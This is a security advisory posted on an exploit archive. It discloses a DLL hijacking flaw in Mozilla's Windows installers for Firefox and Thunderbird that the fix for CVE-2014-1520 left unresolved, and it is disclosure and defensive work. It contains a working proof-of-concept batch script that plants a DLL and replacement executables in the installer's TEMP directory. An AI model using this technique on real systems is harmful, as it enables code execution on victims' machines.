exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Mozilla Firefox DLL Hijacking

Mozilla Firefox DLL Hijacking
Posted Jun 15, 2016
Authored by Stefan Kanthak

The fix applied for CVE-2014-1520 does not fix a DLL hijacking issue with Mozilla Firefox's executable installer.

tags | exploit
systems | windows
advisories | CVE-2014-1520
SHA-256 | e199135bedf5e3f7e1d5caca9f00c1556e12da31282d21a64a24691d122836fc

Mozilla Firefox DLL Hijacking

Change Mirror Download
Hi @ll,

<https://bugzilla.mozilla.org/show_bug.cgi?id=961676> should
have fixed CVE-2014-1520 in Mozilla's executable installers for
Windows ... but does NOT!

JFTR: this type of vulnerability (really: a bloody stupid trivial
beginner's error!) is well-known and well-documented as
<https://cwe.mitre.org/data/definitions/379.html>.


Proof of concept/demonstration:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

0. download "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",
"Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe"
and save them in an arbitrary directory;

1. download <http://home.arcor.de/skanthak/download/SHFOLDER.DLL>
plus <http://home.arcor.de/skanthak/download/SENTINEL.EXE> and
save them in an(other) arbitrary directory;

2. start your editor, copy and paste the following 10 lines and
save them as "POC.CMD" in the same directory as "SHFOLDER.DLL"
and "SENTINEL.EXE" downloaded in step 1:

:WAIT1
@If Not Exist "%TEMP%\7z*.tmp" Goto :WAIT1
For /D %%! In ("%TEMP%\7z*.tmp") Do Set foobar=%%!
Copy "%~dp0shfolder.dll" "%foobar%\shfolder.dll"
:WAIT2
@If Not Exist "%foobar%\core\maintenanceservice.exe" Goto :WAIT2
Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice.exe"
:WAIT3
@If Not Exist "%foobar%\core\maintenanceservice_installer.exe" Goto :WAIT3
Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice_installer.exe"

3. execute the batch script "POC.CMD" created in step 2;

4. execute "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",
"Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe"
downloaded in step 0. and proceed as directed: notice the message
boxed displayed from the copies of "SHFOLDER.DLL" and "SENTINEL.EXE"
placed by the batch script started in step 3 in the unsafe TEMP
subdirectory created by Mozilla's vulnerable executable installers!

PWNED!


Mitigation(s):
~~~~~~~~~~~~~~

0. don't use executable installers. DUMP THEM, NOW!

1. see <http://home.arcor.de/skanthak/!execute.html> as well as
<http://home.arcor.de/skanthak/SAFER.html>.

2. stay away from Mozilla's vulnerable installers for their Windows
software (at least until Mozilla starts to develop a sense for
the safety and security of their users).


stay tuned
Stefan Kanthak


Timeline:
~~~~~~~~~

2015-10-25 <https://bugzilla.mozilla.org/show_bug.cgi?id=1218199>

not even an attempt to fix this vulnerability (check but
<https://blog.mozilla.org/blog/2015/10/23/mozilla-launches-open-source-support-program/>)

2016-04-30 <https://bugzilla.mozilla.org/show_bug.cgi?id=1269111>
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269113>
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269122>
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269123>
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269142>
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269144>

not even an attempt to fix this vulnerability (check but
<https://blog.mozilla.org/blog/2016/06/09/help-make-open-source-secure/>)

2016-06-15 deadline expired after 45 days, report published
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close